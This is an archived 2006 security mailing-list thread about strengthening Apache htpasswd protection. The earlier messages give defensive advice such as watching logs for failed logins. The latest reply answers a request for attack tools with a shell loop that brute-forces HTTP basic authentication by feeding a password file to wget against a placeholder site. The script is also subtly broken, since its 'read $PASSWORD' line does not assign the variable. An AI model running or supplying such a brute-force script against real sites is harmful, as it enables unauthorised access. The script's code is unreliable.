Re: Web Authentication
- From: streck@xxxxxxxxxxx (Florian Streck)
- Date: Mon, 31 Jul 2006 13:48:35 +0200
Please use such programs only if you have a permission from the
target.site. Anything else would be very unpolite.
cat passwordfile | while read $PASSWORD ; do
echo trying: $PASSWORD
wget -q --user=USERNAME --password=$PASSWORD http://target.site/
if [ $? -eq 0 ] ; then
echo $PASSWORD
break
fi
done
On Fri, Jul 28, 2006 at 07:58:22AM +0300, pimp mastermind wrote:
Hi there... do you know some software or exploit or whatever which can
make a brute force attack to htaccess? i just want to see how it works
or if there is some web site with more detailed information about this
kind of attack (brute force) ...actually i know how its work when you
try to compromise some work station but i never knew how it works with
htaccess. Thanks all
On 7/27/06, Florian Streck <streck@xxxxxxxxxxx> wrote:
On Mon, Jul 24, 2006 at 10:54:46AM +0300, Maxim Kostyukov wrote:
What exactly you want to achieve by doing "better web authentication"?
In you case, what are those weaknesses with htpasswd scheme?
Well the problem with htaccess is that there is no mechanism that
checks for the number of trials or failures.
So you can brute-force your way in.
I am asking because it is almost impossible to answer your question
without additional info.
----- Original Message -----
From: "pimp mastermind" <gbchustla@xxxxxxxxx>
To: <security-basics@xxxxxxxxxxxxxxxxx>
Sent: Thursday, July 20, 2006 7:36 AM
Subject: Web Authentication
I have Slackware 10.1 runing. I am using it as a router and
fileserver. I use Apache 1.3 for web access. I have some web
directories which i want to secure more strongly than with htpasswd
but i dont know any other ways of authentication. Also a lot of my
scripts in those directories are wirted in PHP Perl and CGI scripting.
I need to find a better way of authentication? Does any one knows any
better way of authentication?
Thank you all in advance for your help
You could for example write a script that checks the logfiles for failed
access
attempts and if there are to many restrict the access permissions for
the directories.
Otherwise you have to use scripts that provide the content of the
directories.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (GNU/Linux)
iD8DBQFEyJFrIXCBARCXXgwRAtD+AKCBShe/vqtLI2nEh08sLJLeKZRPggCcCJx7
0UHI6UBCVP4mo7fNdm479Es=
=/Vzg
-----END PGP SIGNATURE-----
--
Sabberle:
Im Sommer schwitzt der Mensch sich tot, und ist er nackt so wird er rot.
Attachment:
signature.asc
Description: Digital signature
- References:
- Web Authentication
- From: pimp mastermind
- Re: Web Authentication
- From: Maxim Kostyukov
- Re: Web Authentication
- From: Florian Streck
- Re: Web Authentication
- From: pimp mastermind
- Web Authentication
- Prev by Date: Re: Windows debugging/vulnerability analysis
- Next by Date: RE: Windows debugging/vulnerability analysis
- Previous by thread: Re: Web Authentication
- Next by thread: Re: Web Authentication
- Index(es):
Relevant Pages
|
|
